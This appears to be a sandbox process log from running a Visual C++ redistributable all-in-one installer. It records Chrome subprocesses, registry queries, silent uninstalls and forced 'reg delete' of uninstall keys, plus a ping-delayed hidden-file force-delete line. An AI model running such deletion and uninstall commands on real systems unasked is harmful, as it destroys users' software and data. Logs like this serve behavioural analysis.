"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4404 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4412 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4460 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4432 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4896 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\$RH4JZXS.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4836 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1604 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1596 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3368 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4448 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4760 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4920 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4924 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5060 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1960,i,5462018134948725155,5704364745613981976,131072 /prefetch:8

C:\Users\Admin\Downloads\VisualCppRedist_AIO_x86_x64.exe

"C:\Users\Admin\Downloads\VisualCppRedist_AIO_x86_x64.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Installer.cmd" /auto"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg.exe query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop

C:\Windows\system32\reg.exe

reg.exe query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ver"

C:\Windows\system32\findstr.exe

findstr /c:" 5."

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\system32\reg.exe

reg query "HKU\S-1-5-19"

C:\Windows\system32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get CreationClassName /value

C:\Windows\system32\find.exe

find /i "ComputerSystem"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query "hklm\software\microsoft\Windows NT\currentversion" /v productname" 2>nul

C:\Windows\system32\reg.exe

reg query "hklm\software\microsoft\Windows NT\currentversion" /v productname

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query "hklm\software\microsoft\Windows NT\currentversion" /v UBR" 2>nul

C:\Windows\system32\reg.exe

reg query "hklm\software\microsoft\Windows NT\currentversion" /v UBR

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "hklm\software\microsoft\Windows NT\currentversion" /v buildlabex

C:\Windows\system32\reg.exe

reg query "hklm\software\microsoft\Windows NT\currentversion" /v buildlabex

C:\Windows\system32\reg.exe

reg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled

C:\Windows\system32\find.exe

find /i "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled

C:\Windows\system32\find.exe

find /i "0x0"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2012 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 Preview Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 RC Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 14 CTP Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 Preview Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 CTP Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 RC Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2017 RC Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2017 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2019 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2022 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015-2019 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015-2022 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

findstr /i "HKEY_LOCAL_MACHINE" "C:\Users\Admin\AppData\Local\Temp\wix.txt"

C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe

"C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe" /uninstall /passive /norestart

C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe

"C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe" /uninstall /passive /norestart -burn.unelevated BurnPipe.{A930217B-F692-413F-A085-F5ABA5FDDCEC} {47A651E1-A3A2-40A0-A8CD-61AB380C1247} 4756

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} /f

C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe

"C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe" /uninstall /passive /norestart

C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe

"C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe" /uninstall /passive /norestart -burn.unelevated BurnPipe.{FD05C145-AAF7-465C-A00E-ABA801FCD33D} {7A8B7054-0C1A-476C-9B70-752F3A0F26D3} 1824

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} /f

C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe

"C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe" /uninstall /passive /norestart

C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe

"C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe" /uninstall /passive /norestart -burn.unelevated BurnPipe.{33344C54-0E2A-426E-AB0F-3CB917EDF89A} {A0DDFAB0-E558-4AE1-9EA6-9A0B8424ED7B} 3224

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36} /f

C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe

"C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe" /uninstall /passive /norestart

C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe

"C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe" /uninstall /passive /norestart -burn.unelevated BurnPipe.{FE02195E-54F0-491B-9761-3F8F6D8D732C} {23E9D1DE-64E1-46BA-B3FB-6B0AB883AFF7} 3464

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412} /f

C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe

"C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\vc_redist.x86.exe" /uninstall /passive /norestart

C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe

"C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe" -burn.clean.room="C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe" -burn.filehandle.attached=584 -burn.filehandle.self=600 /uninstall /passive /norestart

C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe

"C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{5BE5FEC9-2B87-4755-8009-2CDB47CEA6CC} {44706049-7554-4DF8-87E5-F48A3BD3A579} 1384

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e} /f

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\vc_redist.x64.exe" /uninstall /passive /norestart

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=584 -burn.filehandle.self=600 /uninstall /passive /norestart

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{723DB2BE-C99A-4A23-BE49-7D5AABDC9F2E} {ED889213-72AC-4D06-8384-B9C361F1B91D} 5100

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13} /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp100.dll"

C:\Windows\system32\cscript.exe

cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp100.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo 0.40219.473

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp110.dll"

C:\Windows\system32\cscript.exe

cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp110.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo 0.61135.400

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp120.dll"

C:\Windows\system32\cscript.exe

cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp120.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo 0.40664.0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp140.dll"

C:\Windows\system32\cscript.exe

cscript.exe //nologo filever.vbs "C:\Windows\SysWOW64\msvcp140.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo 40.33810.0

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2005 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

findstr /i /v {710f4c1c-cc18-4c49-8cbf-51240c89a1a2}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2005 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2008 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

findstr /i /v {9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2008 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2010 x86 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

findstr /i /v {F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2010 x86 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2012 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2012 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {D401961D-3A20-3AC7-943B-6139D5BD490A}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2013 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {8122DAB1-ED4D-3676-BB0A-CA368196543E}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2022 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {5EA6C998-D5AC-4ED9-89C3-9F25B17CCD3D}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2022 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i /v {0C3457A0-3DCE-4A33-BEF0-9B528C557771}

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 14 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 14 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2015 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2017 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2017 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2019 x86 Additional Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\reg.exe

reg query hklm\software\wow6432node\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2019 x86 Minimum Runtime" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /i "HKEY_LOCAL_MACHINE" "C:\Users\Admin\AppData\Local\Temp\msi.txt"

C:\Windows\system32\msiexec.exe

MsiExec.exe /X{9BE518E6-ECC6-35A9-88E4-87755C07200F} /passive /norestart

\??\c:\Windows\syswow64\MsiExec.exe

c:\Windows\syswow64\MsiExec.exe -Embedding 5F0F56C453E9198A0991759B64A2DABC

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} /f

C:\Windows\system32\msiexec.exe

MsiExec.exe /X{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} /passive /norestart

\??\c:\Windows\syswow64\MsiExec.exe

c:\Windows\syswow64\MsiExec.exe -Embedding C455B8983C091FA822F6884EFD5321F7

C:\Windows\system32\reg.exe

reg delete hklm\software\wow6432node\microsoft\windows\currentversion\uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cscript.exe //nologo filever.vbs "C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll"

C:\Windows\system32\cscript.exe

cscript.exe //nologo filever.vbs "C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo 0.60917.0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cscript.exe //nologo filever.vbs "C:\Windows\System32\msvcp100.dll"

C:\Windows\system32\cscript.exe

cscript.exe //nologo filever.vbs "C:\Windows\System32\msvcp100.dll"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c echo 0.40219.473

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2005 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

findstr /i /v {ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2005 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\reg.exe

reg query hklm\software\microsoft\windows\currentversion\uninstall /f "Microsoft Visual C++ 2008 Redistributable" /s

C:\Windows\system32\find.exe

find /i "HKEY_LOCAL_MACHINE"

C:\Windows\system32\findstr.exe

findstr /r "{.*-.*-.*-.*-.*}"

C:\Windows\system32\findstr.exe

